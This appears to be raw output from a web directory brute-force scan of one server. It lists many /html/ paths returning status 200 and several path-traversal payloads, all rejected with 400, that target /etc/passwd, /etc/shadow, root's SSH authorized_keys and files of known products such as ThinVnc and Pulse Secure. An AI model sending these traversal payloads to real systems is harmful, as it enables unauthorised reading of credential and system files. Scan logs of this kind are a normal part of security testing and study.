/%2e%2e//google.com   (Status: 400) [Size: 915]
/html/config.rb       (Status: 200) [Size: 20293]
/html/cgi-bin/        (Status: 200) [Size: 20291]
/robots.txt           (Status: 200) [Size: 116]
/modx/assets/cache/docid_1/../../../../../../../etc/passwd\0.pagecache.php (Status: 400) [Size: 915]
/html/setpriority.php (Status: 200) [Size: 20299]
/html/maketorrent.php (Status: 200) [Size: 20299]
/html/functions.php   (Status: 200) [Size: 20297]
/html/nhome.html      (Status: 200) [Size: 20294]
/html/modemmenu.htm   (Status: 200) [Size: 20297]
/html/metainfo.php    (Status: 200) [Size: 20296]
/html/gfxgen.php      (Status: 200) [Size: 20294]
/html/stattbl.htm     (Status: 200) [Size: 20295]
/html/admin.php       (Status: 200) [Size: 20293]
/html/login.php       (Status: 200) [Size: 20293]
/my_keys&dst=../../../root/.ssh/authorized_keys (Status: 400) [Size: 915]
/votes/../../admin/multiuser/multiuser.php (Status: 400) [Size: 915]
/signezui/playlist/edit/upload/../../../../../../../../../../etc/passwd (Status: 400) [Size: 915]
/html/details.php     (Status: 200) [Size: 20295]
/html/mainfile.php    (Status: 200) [Size: 20296]
/html/json.html       (Status: 200) [Size: 20293]
/html/forum.inc.php   (Status: 200) [Size: 20297]
/html/startpop.php    (Status: 200) [Size: 20296]
/html/dir.php         (Status: 200) [Size: 20291]
//jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd (Status: 400) [Size: 915]
//./../../../../../../../../../../etc/shadow (Status: 400) [Size: 915]
//css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 400) [Size: 915]
//dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ (Status: 400) [Size: 915]
//js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 400) [Size: 915]
//lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 400) [Size: 915]
//res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 400) [Size: 915]
//xyz/../../ThinVnc.ini (Status: 400) [Size: 915]
//../agc/bp.pl        (Status: 400) [Size: 915]
